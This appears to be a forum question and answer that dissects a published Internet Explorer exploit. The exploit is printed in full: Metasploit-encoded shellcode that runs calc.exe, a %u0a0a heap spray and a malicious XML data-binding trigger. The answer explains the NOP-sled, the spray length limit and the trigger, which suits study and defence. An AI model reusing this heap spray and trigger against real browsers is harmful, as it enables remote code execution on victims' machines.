I usually do not have difficulty to read JavaScript code but for this one I can’t figure out the logic. The code is from an exploit that has been published 4 days ago. You can find it at milw0rm.
Here is the code:
<html> <div id='replace'>x</div> <script> // windows/exec - 148 bytes // http://www.metasploit.com // Encoder: x86/shikata_ga_nai // EXITFUNC=process, CMD=calc.exe var shellcode = unescape('%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580'); // ugly heap spray, the d0nkey way! // works most of the time var spray = unescape('%u0a0a%u0a0a'); do { spray += spray; } while(spray.length < 0xd0000); memory = new Array(); for(i = 0; i < 100; i++) memory[i] = spray + shellcode; xmlcode = '<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>'; tag = document.getElementById('replace'); tag.innerHTML = xmlcode; </script> </html>
Here is what I believe it does and I would like you to help me for the part that I misunderstand.
The variable shellcode contains the code to open the calc.exe. I do not get how they have found that weird string. Any idea?
The second thing is the variable spray. I do not understand this weird loop.
The third thing is the variable memory that is never used anywhere. Why do they create it?
Last thing: what does the XML tag do in the page?
For the moment I have good answers but mostly very general ones. I would like more explanations of the value of the code. An example is unescape('%u0a0a%u0a0a');. What does it mean? Same thing for the loop: why did the developer write: length < 0xd0000? I would like a deeper understanding, not only the theory of this code.
The shellcode contains some x86 assembly instructions that will do the actual exploit.
spraycreates a long sequence of instructions that will be put inmemory. Since we can’t usually find out the exact location of our shellcode in memory, we put a lot ofnopinstructions before it and jump to somewhere there. Thememoryarray will hold the actual x86 code along with the jumping mechanism. We’ll feed the crafted XML to the library which has a bug. When it’s being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.To understand more deeply, you should actually figure out what is in the x86 code.
unscapewill be used to put the sequence of bytes represented of the string in thesprayvariable. It’s valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can’t have strings larger than a specific length.In x86 assembly,
0a0arepresentsor cl, [edx]. This is effectively equivalent tonopinstruction for the purposes of our exploit. Wherever we jump to in thespray, we’ll get to the next instruction until we reach the shellcode which is the code we actually want to execute.If you look at the XML, you’ll see
0x0a0ais there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it’s exploited, which I don’t know). However, it seems that we force Internet Explorer to trigger the buggy code by setting theinnerHtmlto that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it’s a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executingor cl, [edx]instructions until in reaches the beginning of shellcode that’s put in memory.I’ve disassembled the shellcode:
Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute
calc.exe.